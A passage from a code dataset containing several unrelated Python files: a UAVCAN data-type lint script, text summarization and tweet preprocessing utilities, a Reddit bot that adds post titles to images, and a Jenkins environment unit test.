:\n# https://youtu.be/j0bxDg0PXRM?t=2062","sub_path":"applications/markov/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"114259904","text":"#!/usr/bin/env python3\n\nimport sys\nimport time\nimport string\nimport pydsdl\nfrom functools import partial\n\n\nMAX_SERIALIZED_BIT_LENGTH = 313 * 8 # See README\nMAX_LINE_LENGTH = 120\nNAMESPACES_EXEMPTED_FROM_HEADER_COMMENT_REQUIREMENT = 'uavcan.primitive', 'uavcan.si'\nALLOWED_CHARACTERS = set(string.digits + string.ascii_letters + string.punctuation + ' ')\n\n\ndef die_at(ty, line_index, *text):\n prefix = '%s:%d:' % (ty.source_file_path, line_index + 1)\n print(prefix, *text, file=sys.stderr)\n sys.exit(1)\n\n\ndef on_print(file_path, line, value):\n print('%s:%d: %s' % (file_path, line, value), file=sys.stderr)\n\n\ndef compute_max_num_frames_canfd(bit_length):\n b = (bit_length + 7) // 8\n if b <= 63:\n return 1\n else:\n return (b + 2 + 62) // 63\n\n\nstarted_at = time.monotonic()\noutput = pydsdl.read_namespace('uavcan', [], print_output_handler=on_print)\nelapsed_time = time.monotonic() - started_at\n\nprint('Full data type name'.center(58),\n 'FSID'.center(5),\n 'CAN FD fr'.center(9))\n\nfor t in output:\n num_frames_to_str = lambda x: str(x) if x > 1 else ' ' # Return empty for single-frame transfers\n if isinstance(t, pydsdl.ServiceType):\n max_canfd_frames = ' '.join([\n num_frames_to_str(compute_max_num_frames_canfd(max(x.bit_length_set)))\n for x in (t.request_type, t.response_type)\n ])\n else:\n max_canfd_frames = num_frames_to_str(compute_max_num_frames_canfd(max(t.bit_length_set)))\n\n print(str(t).ljust(58),\n str(t.fixed_port_id if t.has_fixed_port_id else '').rjust(5),\n max_canfd_frames.rjust(7) + ' ')\n\nprint('%d data types in %.1f seconds' % (len(output), elapsed_time),\n file=sys.stderr)\n\nfor t in output:\n text = open(t.source_file_path).read()\n for index, line in enumerate(text.split('\\n')):\n line = line.strip('\\r\\n')\n abort = partial(die_at, t, index)\n\n # Check header comment\n if index == 0 and line != '#':\n if not any(map(lambda e: t.full_namespace.startswith(e),\n NAMESPACES_EXEMPTED_FROM_HEADER_COMMENT_REQUIREMENT)):\n abort('Every data type definition must have a header comment surrounded with \"#\\\\n\",',\n 'unless it is a member of:', NAMESPACES_EXEMPTED_FROM_HEADER_COMMENT_REQUIREMENT)\n\n # Check trailing comment placement\n # TODO: this test breaks on string literals containing \"#\"\n if not line.startswith('#') and '#' in line and ' #' not in line:\n abort('Trailing line comments must be separated from the preceding text with at least two spaces')\n\n if line != '#' and '#' in line and '# ' not in line:\n abort('The text of a comment must be separated from the comment character with a single space')\n\n if line.endswith(' '):\n abort('Trailing spaces are not permitted')\n\n # Check line length limit\n if len(line) > MAX_LINE_LENGTH:\n abort('Line is too long:', len(line), '>', MAX_LINE_LENGTH, 'chars')\n\n # Make sure we're not using any weird characters such as tabs or non-ASCII-printable\n for char_index, char in enumerate(line):\n if char not in ALLOWED_CHARACTERS:\n abort('Disallowed character', repr(char), 'code', ord(char), 'at column', char_index + 1)\n\n if not text.endswith('\\n') or text.endswith('\\n' * 2):\n abort('A file must contain exactly one blank line at the end')\n\n\ndef get_max_bit_length(ty) -> int:\n if isinstance(ty, pydsdl.ServiceType):\n return max(map(max, (ty.request_type.bit_length_set,\n ty.response_type.bit_length_set)))\n else:\n return max(ty.bit_length_set)\n\n\nfor t in output:\n max_bit_length = get_max_bit_length(t)\n if max_bit_length > MAX_SERIALIZED_BIT_LENGTH:\n text = open(t.source_file_path).read()\n if '#pragma:no-bit-length-limit' not in text.replace(' ', ''):\n print('The data type', t, 'exceeds the bit length limit of', MAX_SERIALIZED_BIT_LENGTH, file=sys.stderr)\n sys.exit(1)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"627028209","text":"class SummerTime:\n # an algorithm that is able to summarize text\n # function lex_rank_analysis is created and defined\n def lex_rank_analysis (self, parser_configuration, number_of_lines_to_output, sumy=None):\n # Using LexRank\n # LexRank also incorporates an intelligent post-processing step which makes sure\n # that top sentences chosen for the summary are not too similar to each other.\n\n # import LexRankSummarizer from sumy api\n from sumy.summarizers.lex_rank import LexRankSummarizer\n # summarizer = the imported class LexRankSummarizer()\n summarizer = LexRankSummarizer()\n # Summarize the text and output n sentance\n summarization_result = summarizer(parser_configuration.document, number_of_lines_to_output)\n # debug raw output to console.\n print(f\"\\nBegin Raw summary from LexRank\\n\")\n for sentance in summarization_result:\n print(sentance)\n print(f\"\\nEnd Raw summary from LexRank\\n\")\n # Return summer Result\n return summarization_result\n\n # an algorithm able to summarize text\n # function lsa_analysis is created and defined\n def lsa_analysis(self, parser_configuration, number_of_lines_to_output):\n # using LSA\n # LSA works by projecting the data into a lower dimensional\n # space without any significant loss of information.\n # singular vectors can capture and represent word combination patterns which are recurring\n\n #import LsaSummarizer from sumy api\n from sumy.summarizers.lsa import LsaSummarizer\n # summarizer = the imported class LsaSummarizer()\n summarizer = LsaSummarizer()\n # Summarize the text and output n sentences\n summarization_result = summarizer(parser_configuration.document, number_of_lines_to_output)\n # debug raw output to console.\n print(f\"\\nBegin Raw summary from LSA\\n\")\n for sentance in summarization_result:\n print(sentance)\n print(f\"\\nEnd Raw summary from LSA\\n\")\n # Return summer Result\n return summarization_result\n\n # an algorithm able to summarize text\n # function luhh_analysis is created and defined\n def luhn_analysis(self, parser_configuration, number_of_lines_to_output):\n # using Luhh\n # ranks sentences for summarization extracts by considering “significant” words,\n # which are frequently occurring words in a document\n from sumy.summarizers.luhn import LuhnSummarizer\n # summarizer = the imported class LuhnSummarizer()\n summarizer = LuhnSummarizer()\n # Summarize the text and output n sentences\n summarization_result = summarizer(parser_configuration.document, number_of_lines_to_output)\n # debug raw output to console.\n print(f\"\\nBegin Raw summary from Luhn\\n\")\n for sentance in summarization_result:\n print(sentance)\n print(f\"\\nEnd Raw summary from Luhn\\n\")\n # Return summer Result\n return summarization_result\n\n","sub_path":"SummerTime.py","file_name":"SummerTime.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"90242615","text":"from nltk.stem import WordNetLemmatizer\nimport spacy\nfrom src.hooks.pretokenization import *\nfrom src.hooks.posttokenization import *\nfrom src.hooks.spell_check import *\nfrom src.hooks.annotation_normalization import *\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport copy\n\nnlp_small = spacy.load('en_core_web_lg', disable=[\"parser\", \"ner\"])\nnlp = spacy.load('en_core_web_lg')\n\n\ndef tokenize(raw, tokenizer=\"split\"):\n if tokenizer == \"spacy\":\n return [token.text for token in nlp.tokenizer(raw)]\n if tokenizer == \"split\":\n return raw.split(\" \")\n\n\nlemmatizer = WordNetLemmatizer()\n\n\ndef lemmatize(tokens):\n lem = list()\n for token in tokens:\n lem.append(lemmatizer.lemmatize(token))\n return lem\n\n\ndef build_vocab(data):\n vocab = dict()\n index = 1\n for sent in data:\n for word in sent:\n if word not in vocab.keys():\n vocab.update({word: index})\n index += 1\n return vocab\n\n\ndef encode_sentence(sentence, vocab):\n encoded = list()\n for word in sentence:\n if word in vocab.keys():\n encoded.append(vocab[word])\n else:\n encoded.append(0)\n return encoded\n\n\ndef encode_data(data, vocab):\n encoded_data = list()\n for sent in data:\n encoded_data.append(encode_sentence(sent, vocab))\n return encoded_data\n\n\ndef split_train_validate_test(data, labels, train_valtest_ratio, validate_test_ratio, random_state=42):\n X_train, X_valtest, y_train, y_valtest = train_test_split(data, labels, test_size=train_valtest_ratio,\n random_state=random_state)\n X_validate, X_test, y_validate, y_test = train_test_split(X_valtest, y_valtest, test_size=validate_test_ratio,\n random_state=random_state)\n\n return X_train, X_validate, X_test, y_train, y_validate, y_test\n\n\n# init_emoji(\"/home/ivan/Documents/git_repos/Sentiment-Analysis-on-Twitter/data/emoticons.txt\")\n\n\ndef process_dataset(data):\n dataset = list()\n for i in range(len(data)):\n new_tweet = repair_chars(data[i])\n anot = copy.deepcopy(new_tweet)\n anot = new_tweet\n new_tweet = remove_usernames(new_tweet)\n new_tweet = remove_links(new_tweet)\n new_tweet = replace_useful_emoticons(new_tweet)\n new_tweet = remove_punctuation(new_tweet)\n\n tweet_tokens = tokenize(new_tweet, tokenizer=\"spacy\")\n tweet_tokens = remove_stopwords(raw=\"\", tokenized=tweet_tokens)\n\n anot = annotation_normalization(anot)\n anot_tokens = tokenize(anot, tokenizer=\"split\")\n anot_tokens = spell_check_tokens(anot_tokens)\n anot_tokens = replace_slang_tokens(anot_tokens)\n anot_tokens = remove_stopwords_tokens(anot_tokens)\n anot_tokens = lemmatize(anot_tokens)\n\n dataset.append({\"tweet\": new_tweet, \"tweet_tokens\": tweet_tokens, \"anot\": anot, \"anot_tokens\": anot_tokens})\n # dataset.append({\"anot_tokens\": anot_tokens})\n return dataset\n\n\ndef create_vocab_encode_data(tokens):\n vocab = build_vocab(tokens)\n encoded_data = encode_data(data=tokens, vocab=vocab)\n return vocab, encoded_data\n\n\ndef pad_encoded_data(encoded, seq_length):\n features = np.zeros((len(encoded), seq_length), dtype=float)\n for i, review in enumerate(encoded):\n if len(review) > seq_length:\n review = review[:seq_length]\n zeroes = list(np.zeros(seq_length - len(review)))\n new = zeroes + review\n features[i, :] = np.array(new)\n return features\n\n\ndef make_embedding_matrix(vocab, embedding_dim=300):\n hits, misses = 0, 0\n embedding_matrix = np.zeros((len(vocab) + 1, embedding_dim))\n for word, i in vocab.items():\n token = nlp(word)\n if token.has_vector:\n embedding_matrix[i] = token.vector\n hits += 1\n else:\n misses += 1\n\n print(\"Converted %d words (%d misses)\" % (hits, misses))\n return embedding_matrix\n\n\ndef bag_of_words_embedding(data):\n print(\"BOW embedding...\")\n # corpus = np.array([d for d in data])\n return np.array([nlp(str(doc)).vector for doc in data])\n\n\ndef average_word_vectors(tokens, vocab, embedding_matrix, num_features=300):\n feature_vector = np.zeros((num_features,), dtype=\"float64\")\n n_words = 0.\n for word in tokens:\n if word in vocab:\n n_words += 1.\n feature_vector = np.add(feature_vector, embedding_matrix[vocab[word]])\n\n if n_words:\n feature_vector = np.divide(feature_vector, n_words)\n\n return feature_vector\n\n\ndef bow_averaged_embeddings(data, vocab, embedding_matrix):\n features = [average_word_vectors(tokenized_sentence, vocab, embedding_matrix)\n for tokenized_sentence in data]\n return np.array(features)\n","sub_path":"src/hooks/various_functions.py","file_name":"various_functions.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"47969856","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nTitle2ImageBot\r\nComplete redesign of titletoimagebot by gerenook with non-deprecated apis\r\n\r\nThis file contains the main methods, and the methods to handle post processing\r\nImage Processing / Imgur Uploading is done in t2utils\r\n\r\n\"\"\"\r\n\r\nauthor = 'calicocatalyst'\r\nversion = '0.3b'\r\n\r\nimport praw\r\nfrom praw.models import MoreComments, Comment\r\nimport pyimgur\r\nfrom PIL import Image, ImageDraw, ImageFont, ImageSequence\r\n\r\nfrom gfypy import gfycat\r\nimport argparse\r\nimport messages\r\nimport time\r\nimport logging\r\nfrom math import ceil\r\nfrom os import remove\r\nimport re\r\nimport requests\r\nfrom io import BytesIO\r\n\r\nimport configparser\r\n\r\n\r\nclass TitleToImageBot(object):\r\n def __init__(self):\r\n pass\r\n def check_mentions_for_requests(self, postlimit=10):\r\n for message in reddit.inbox.all(limit=postlimit):\r\n self.process_message(message)\r\n def check_subs_for_posts(self, postlimit=25):\r\n subs = get_automatic_processing_subs()\r\n for sub in subs:\r\n boot = sub == 'boottoobig'\r\n subr = reddit.subreddit(sub)\r\n for post in subr.new(limit=postlimit):\r\n if check_if_parsed(post.id):\r\n continue\r\n title = post.title\r\n if boot:\r\n triggers = [',', ';', 'roses']\r\n if not any(t in title.lower() for t in triggers):\r\n logging.debug('Title is probably not part of rhyme, skipping submission')\r\n add_parsed(post.id)\r\n continue\r\n self.process_submission(post, None, None)\r\n add_parsed(post.id)\r\n \r\n def reply_imgur_url(self, url, submission, source_comment, upscaled=False):\r\n \"\"\"\r\n :param url: Imgur Url\r\n :type url: str\r\n :param submission: Submission that the post was on. Reply if source_comment = False\r\n :type submission: praw.models.Submission\r\n :param source_comment: Comment that invoked bot if it exists\r\n :type source_comment: praw.models.Comment\r\n :returns: True on success, False on failure\r\n :rtype: bool\r\n \"\"\"\r\n if url == None:\r\n \r\n logging.info('URL returned as none.')\r\n logging.debug('Checking if Bot Has Already Processed Submission')\r\n # This should return if the bot has already replied.\r\n # So, lets check if the bot has already been here and reply with that instead!\r\n for comment in submission.comments.list():\r\n if isinstance(comment, MoreComments):\r\n # See praw docs on MoreComments\r\n continue\r\n if not comment or comment.author == None:\r\n # If the comment or comment author was deleted, skip it\r\n continue\r\n if comment.author.name == reddit.user.me().name and 'Image with added title' in comment.body:\r\n if source_comment:\r\n self.responded_already_reply(source_comment, comment, submission)\r\n \r\n add_parsed(submission.id)\r\n # Bot is being difficult and replying multiple times so lets try this :)\r\n return\r\n logging.info('Creating reply')\r\n reply = messages.standard_reply_template.format(\r\n image_url=url,\r\n nsfw=\"(NSFW)\" if submission.over_18 else '',\r\n upscaled=' (image was upscaled)\\n\\n' if upscaled else '',\r\n submission_id=submission.id\r\n )\r\n try:\r\n if source_comment:\r\n source_comment.reply(reply)\r\n else:\r\n submission.reply(reply)\r\n except praw.exceptions.APIException as error:\r\n logging.error('Reddit api error, we\\'ll try to repost later | %s', error)\r\n return False\r\n except Exception as error:\r\n logging.error('Cannot reply, skipping submission | %s', error)\r\n return False\r\n add_parsed(submission.id)\r\n return True\r\n \r\n def responded_already_reply(self, source_comment, comment, submission):\r\n com_url = messages.comment_url.format(postid=submission.id, commentid=comment.id)\r\n reply = messages.already_responded_message.format(commentlink=com_url)\r\n \r\n source_comment.reply(reply)\r\n \r\n add_parsed(source_comment.id)\r\n \r\n def process_submission(self, submission, source_comment, title):\r\n '''\r\n Process Submission Using t2utils given the above args, and use the other\r\n provided function to reply\r\n \r\n :param submission: Submission object containing image to parse\r\n :type submission: praw.models.submission\r\n :param source_comment: Comment that invoked if any did, may be NoneType\r\n :type source_comment: praw.models.Comment\r\n :param title: Custom title if any (Currently it will always be None)\r\n :type title: String\r\n '''\r\n \r\n url = process_image_submission(submission)\r\n self.reply_imgur_url(url, submission, source_comment)\r\n \r\n def process_message(self, message):\r\n \"\"\"Process given message (remove, feedback, mark good/bad bot as read)\r\n \r\n :param message: the inbox message, comment reply or username mention\r\n :type message: praw.models.Message, praw.models.Comment\r\n \"\"\"\r\n if not message.author:\r\n return\r\n author = message.author.name\r\n subject = message.subject.lower()\r\n body_original = message.body\r\n body = message.body.lower()\r\n if check_if_parsed(message.id):\r\n logging.debug(\"bot.process_message() Message %s Already Parsed, Returning\", message.id)\r\n return\r\n if message.author.name.lower()==\"the-paranoid-android\":\r\n message.reply(\"Thanks Marv\")\r\n logging.info(\"Thanking marv\")\r\n add_parsed(message.id)\r\n return\r\n # Skip Messages Sent by Bot\r\n if author == reddit.user.me().name:\r\n logging.debug('Message was sent, returning')\r\n return\r\n # process message\r\n if (isinstance(message, Comment) and\r\n (subject == 'username mention' or\r\n (subject == 'comment reply' and 'u/title2imagebot' in body))):\r\n # Dont reply to automod.\r\n if message.author.name.lower() == 'automoderator':\r\n message.mark_read()\r\n return\r\n \r\n match = False\r\n title = None\r\n if match:\r\n title = match.group(1)\r\n if len(title) > 512:\r\n title = None\r\n else:\r\n logging.debug('Found custom title: %s', title)\r\n self.process_submission(message.submission, message, title)\r\n \r\n message.mark_read()\r\n elif subject.startswith('feedback'):\r\n logging.debug(\"TODO: add feedback forwarding support\")\r\n # mark short good/bad bot comments as read to keep inbox clean\r\n elif 'good bot' in body and len(body) < 12:\r\n logging.debug('Good bot message or comment reply found, marking as read')\r\n message.mark_read()\r\n elif 'bad bot' in body and len(body) < 12:\r\n logging.debug('Bad bot message or comment reply found, marking as read')\r\n message.mark_read()\r\n add_parsed(message.id)\r\n \r\n def run(self, limit):\r\n logging.info('Checking Mentions')\r\n self.check_mentions_for_requests(limit)\r\n logging.info('Checking Autoreply Subs')\r\n self.check_subs_for_posts(limit)\r\n\r\n\r\n\r\n\r\nclass RedditImage:\r\n \"\"\"RedditImage class\r\n\r\n :param image: the image\r\n :type image: PIL.Image.Image\r\n \"\"\"\r\n margin = 10\r\n min_size = 500\r\n # TODO find a font for all unicode chars & emojis\r\n # font_file = 'seguiemj.ttf'\r\n font_file = 'roboto-emoji.ttf'\r\n font_scale_factor = 16\r\n # Regex to remove resolution tag styled as such: '[1000 x 1000]'\r\n regex_resolution = re.compile(r'\\s?\\[[0-9]+\\s?[xX*×]\\s?[0-9]+\\]')\r\n\r\n def __init__(self, image):\r\n self._image = image\r\n self.upscaled = False\r\n width, height = image.size\r\n # upscale small images\r\n if image.size < (self.min_size, self.min_size):\r\n if width < height:\r\n factor = self.min_size / width\r\n else:\r\n factor = self.min_size / height\r\n self._image = self._image.resize((ceil(width * factor),\r\n ceil(height * factor)),\r\n Image.LANCZOS)\r\n self.upscaled = True\r\n self._width, self._height = self._image.size\r\n self._font_title = ImageFont.truetype(\r\n self.font_file,\r\n self._width // self.font_scale_factor\r\n )\r\n\r\n def _split_title(self, title):\r\n \"\"\"Split title on [',', ';', '.'] into multiple lines\r\n\r\n :param title: the title to split\r\n :type title: str\r\n :returns: split title\r\n :rtype: list[str]\r\n \"\"\"\r\n lines = ['']\r\n all_delimiters = [',', ';', '.']\r\n delimiter = None\r\n for character in title:\r\n # don't draw ' ' on a new line\r\n if character == ' ' and not lines[-1]:\r\n continue\r\n # add character to current line\r\n lines[-1] += character\r\n # find delimiter\r\n if not delimiter:\r\n if character in all_delimiters:\r\n delimiter = character\r\n # end of line\r\n if character == delimiter:\r\n lines.append('')\r\n # if a line is too long, wrap title instead\r\n for line in lines:\r\n if self._font_title.getsize(line)[0] + RedditImage.margin > self._width:\r\n return self._wrap_title(title)\r\n # remove empty lines (if delimiter is last character)\r\n return [line for line in lines if line]\r\n\r\n def _wrap_title(self, title):\r\n \"\"\"Wrap title\r\n\r\n :param title: the title to wrap\r\n :type title: str\r\n :returns: wrapped title\r\n :rtype: list\r\n \"\"\"\r\n lines = ['']\r\n line_words = []\r\n words = title.split()\r\n for word in words:\r\n line_words.append(word)\r\n lines[-1] = ' '.join(line_words)\r\n if self._font_title.getsize(lines[-1])[0] + RedditImage.margin > self._width:\r\n lines[-1] = lines[-1][:-len(word)].strip()\r\n lines.append(word)\r\n line_words = [word]\r\n # remove empty lines\r\n return [line for line in lines if line]\r\n\r\n def add_title(self, title, boot, bg_color='#fff', text_color='#000'):\r\n \"\"\"Add title to new whitespace on image\r\n\r\n :param title: the title to add\r\n :type title: str\r\n :param boot: if True, split title on [',', ';', '.'], else wrap text\r\n :type boot: bool\r\n \"\"\"\r\n beta_centering = False\r\n # remove resolution appended to title (e.g. ' [1000 x 1000]')\r\n title = RedditImage.regex_resolution.sub('', title)\r\n line_height = self._font_title.getsize(title)[1] + RedditImage.margin\r\n lines = self._split_title(title) if boot else self._wrap_title(title)\r\n whitespace_height = (line_height * len(lines)) + RedditImage.margin\r\n new = Image.new('RGB', (self._width, self._height + whitespace_height), bg_color)\r\n new.paste(self._image, (0, whitespace_height))\r\n draw = ImageDraw.Draw(new)\r\n for i, line in enumerate(lines):\r\n w,h = self._font_title.getsize(line)\r\n left_margin = ((self._width - w)/2) if beta_centering else RedditImage.margin\r\n draw.text((left_margin, i * line_height + RedditImage.margin),\r\n line, text_color, self._font_title)\r\n self._width, self._height = new.size\r\n self._image = new\r\n\r\n def upload(self, imgur):\r\n \"\"\"Upload self._image to imgur\r\n\r\n :param imgur: the imgur api client\r\n :type imgur: imgurpython.client.ImgurClient\r\n :param config: imgur image config\r\n :type config: dict\r\n :returns: imgur url if upload successful, else None\r\n :rtype: str, NoneType\r\n \"\"\"\r\n path_png = 'temp.png'\r\n path_jpg = 'temp.jpg'\r\n self._image.save(path_png)\r\n self._image.save(path_jpg)\r\n try:\r\n response = imgur.upload_image(path_png, title=\"Uploaded by /u/Title2ImageBot\")\r\n except:\r\n # Likely too large\r\n logging.warning('png upload failed, trying jpg')\r\n try:\r\n response = imgur.upload_image(path_jpg, title=\"Uploaded by /u/Title2ImageBot\")\r\n except:\r\n logging.error('jpg upload failed, returning')\r\n return None\r\n finally:\r\n remove(path_png)\r\n remove(path_jpg)\r\n return response.link\r\n\r\n# -- UTILS --\r\n\r\ndef check_config_for_sub_threshold(sub, config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n if config.has_option(sub, 'threshold'):\r\n return int(config[sub]['threshold'])\r\n else:\r\n return -1\r\n\r\ndef get_automatic_processing_subs(config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n sections = config.sections()\r\n sections.remove('RedditAuth')\r\n sections.remove('ImgurAuth')\r\n sections.remove('GfyCatAuth')\r\n return sections\r\n\r\n\r\ndef process_image_submission(submission, commenter=None, customargs=None):\r\n # TODO implement user selectable options on summons\r\n\r\n # Make sure author account exists\r\n if not submission.author:\r\n add_parsed(submission.id)\r\n return None;\r\n\r\n sub = submission.subreddit.display_name\r\n url = submission.url\r\n title = submission.title\r\n author = submission.author.name\r\n\r\n # We need to verify everything is good to go\r\n # Check every item in this list and verify it is 'True'\r\n # If the submission has been parsed, throw false which will not allow the Bot\r\n # To post.\r\n not_parsed = not check_if_parsed(submission.id)\r\n # TODO add gif support\r\n\r\n checks = [not_parsed]\r\n\r\n if not all(checks):\r\n print(\"Checks failed, not submitting\")\r\n return;\r\n\r\n\r\n if url.endswith('.gif') or url.endswith('.gifv'):\r\n # Lets try this again.\r\n try:\r\n return process_gif(submission)\r\n except:\r\n logging.warn(\"gif upload failed\")\r\n return None\r\n # Attempt to grab the images\r\n try:\r\n response = requests.get(url)\r\n img = Image.open(BytesIO(response.content))\r\n except OSError as error:\r\n logging.warning('Converting to image failed, trying with <url>.jpg | %s', error)\r\n try:\r\n response = requests.get(url + '.jpg')\r\n img = Image.open(BytesIO(response.content))\r\n except OSError as error:\r\n logging.error('Converting to image failed, skipping submission | %s', error)\r\n return\r\n except IOError as error:\r\n print('Pillow couldn\\'t process image, marking as parsed and skipping')\r\n return None;\r\n except Exception as error:\r\n print(error)\r\n print('Exception on image conversion lines.')\r\n return None;\r\n try:\r\n image = RedditImage(img)\r\n except Exception as error:\r\n # TODO add error in debug line\r\n print('Could not create RedditImage with error')\r\n return None;\r\n image.add_title(title, False)\r\n\r\n imgur = get_imgur_client_config()\r\n imgur_url = image.upload(imgur)\r\n\r\n return imgur_url\r\n\r\ndef process_gif(submission):\r\n sub = submission.subreddit.display_name\r\n url = submission.url\r\n title = submission.title\r\n author = submission.author.name\r\n \r\n # If its a gifv and hosted on imgur, we're ok, anywhere else I cant verify it works\r\n if 'imgur' in url and url.endswith(\"gifv\"):\r\n # imgur will give us a (however large) gif if we ask for it\r\n # thanks imgur <3\r\n url = url.rstrip('v')\r\n # Reddit Hosted gifs are going to be absolute hell, served via DASH which\r\n # Can be checked through a fallback url :)\r\n try:\r\n response = requests.get(url)\r\n # Try to get an image if someone linked to imgur but didn't put the .file ext.\r\n except OSError as error:\r\n logging.warning('Converting to image failed, trying with <url>.jpg | %s', error)\r\n try:\r\n response = requests.get(url + '.jpg')\r\n img = Image.open(BytesIO(response.content))\r\n # If that wasn't the case\r\n except OSError as error:\r\n logging.error('Converting to image failed, skipping submission | %s', error)\r\n return\r\n # Lord knows\r\n except IOError as error:\r\n print('Pillow couldn\\'t process image, marking as parsed and skipping')\r\n return None;\r\n # The nature of this throws tons of exceptions based on what users throw at the bot\r\n except Exception as error:\r\n print(error)\r\n print('Exception on image conversion lines.')\r\n return None;\r\n except:\r\n logging.error(\"Could not get image from url\")\r\n return None;\r\n \r\n img = Image.open(BytesIO(response.content))\r\n frames = []\r\n \r\n # Process Gif\r\n \r\n # Loop over each frame in the animated image\r\n for frame in ImageSequence.Iterator(img):\r\n # Draw the text on the frame\r\n \r\n # We'll create a custom RedditImage for each frame to avoid\r\n # redundant code\r\n \r\n # TODO: Consolidate this entire method into RedditImage. I want to make\r\n # Sure this works before I integrate.\r\n \r\n rFrame = RedditImage(frame)\r\n rFrame.add_title(title, False)\r\n \r\n frame = rFrame._image\r\n # However, 'frame' is still the animated image with many frames\r\n # It has simply been seeked to a later frame\r\n # For our list of frames, we only want the current frame\r\n \r\n # Saving the image without 'save_all' will turn it into a single frame image, and we can then re-open it\r\n # To be efficient, we will save it to a stream, rather than to file\r\n b = BytesIO()\r\n frame.save(b, format=\"GIF\")\r\n frame = Image.open(b)\r\n \r\n # The first successful image generation was 150MB, so lets see what all\r\n # Can be done to not have that happen\r\n \r\n # Then append the single frame image to a list of frames\r\n frames.append(frame)\r\n # Save the frames as a new image\r\n path_gif = 'temp.gif'\r\n path_mp4 = 'temp.mp4'\r\n frames[0].save(path_gif, save_all=True, append_images=frames[1:])\r\n # ff = ffmpy.FFmpeg(inputs={path_gif: None},outputs={path_mp4: None})\r\n # ff.run()\r\n \r\n try:\r\n url = get_gfycat_client_config().upload_file(path_gif).url\r\n remove(path_gif)\r\n except:\r\n logging.error('Gif Upload Failed, Returning')\r\n remove(path_gif)\r\n return None\r\n # remove(path_mp4)\r\n return url\r\n\r\ndef get_gfycat_client_config(config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n client_id = config['GfyCatAuth']['publicKey']\r\n client_secret = config['GfyCatAuth']['privateKey']\r\n username = config['GfyCatAuth']['username']\r\n password = config['GfyCatAuth']['password']\r\n client = gfycat.GfyCatClient(client_id,client_secret,username,password)\r\n return client\r\n\r\ndef auth_reddit_from_config(config_file='config.ini'):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n return(praw.Reddit(client_id=config['RedditAuth']['publicKey'],\r\n client_secret=config['RedditAuth']['privateKey'],\r\n username=config['RedditAuth']['username'],\r\n password=config['RedditAuth']['password'],\r\n user_agent=config['RedditAuth']['userAgent']))\r\n\r\n\r\nreddit = auth_reddit_from_config()\r\n\r\ndef get_imgur_client_config(config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n return(pyimgur.Imgur(config['ImgurAuth']['publicKey']))\r\n\r\n\r\ncomment_file_path = \"parsed.txt\"\r\n\r\ndef add_parsed(id):\r\n with open(comment_file_path, 'a+') as f:\r\n f.write(id)\r\n\r\ndef check_if_parsed(id):\r\n with open(comment_file_path,'r+') as f:\r\n return id in f.read();\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Bot To Add Titles To Images')\r\n parser.add_argument('-d', '--debug', help='Enable Debug Logging', action='store_true')\r\n parser.add_argument('-l', '--loop', help='Enable Looping Function', action='store_true')\r\n parser.add_argument('limit', help='amount of submissions/messages to process each cycle',\r\n type=int)\r\n parser.add_argument('interval', help='time (in seconds) to wait between cycles', type=int)\r\n\r\n args = parser.parse_args()\r\n if args.debug:\r\n logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S', level=logging.DEBUG);\r\n else:\r\n logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S', level=logging.INFO);\r\n\r\n # logging.info('Bot initialized, processing the last %s submissions/messages every %s seconds' % (args.limit, args.interval))\r\n bot = TitleToImageBot()\r\n \r\n \r\n logging.debug('Debug Enabled')\r\n if not args.loop:\r\n bot.run(args.limit)\r\n logging.info('Checking Complete, Exiting Program')\r\n exit(0)\r\n while True:\r\n bot.run(args.limit)\r\n logging.info('Checking Complete')\r\n time.sleep(args.interval)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":21946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"227097174","text":"import os\nimport pytest\n\nfrom maketestsgofaster.cloud.env import Env\nfrom maketestsgofaster.cloud.env.jenkins import Jenkins\n\n\ndef test_create(jenkins_env):\n env = Env.create()\n assert env.name() is 'jenkins'\n assert type(env) is Jenkins\n\n\ndef test_settings(jenkins_env):\n env = Env.create()\n assert env.build_id() == 'build_num'\n assert env.build_url() == 'build_url'\n assert env.build_worker() == 'executor_num'\n assert env.context() == {\n 'JOB_NAME': 'job_name',\n 'NODE_NAME': 'node_name',\n }\n assert env.vcs_branch() == 'branch'\n assert env.vcs_revision() == 'git_commit'\n\n\n@pytest.fixture()\ndef jenkins_env():\n os.environ['BUILD_NUMBER'] = 'build_num'\n os.environ['BUILD_URL'] = 'build_url'\n os.environ['EXECUTOR_NUMBER'] = 'executor_num'\n os.environ['GIT_BRANCH'] = 'branch'\n os.environ['GIT_COMMIT'] = 'git_commit'\n os.environ['JENKINS_URL'] = 'jenkins_url'\n os.environ['JOB_NAME'] = 'job_name'\n os.environ['NODE_NAME'] = 'node_name'\n os.environ['WORKSPACE'] = 'workspace'\n yield\n del os.environ['JENKINS_URL']\n","sub_path":"tests/unit/cloud/env/jenkins_test.py","file_name":"jenkins_test.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"480496796","text":"from flask import Blueprint, request\nfrom flask.ext.mako import render_template\n\nmod = 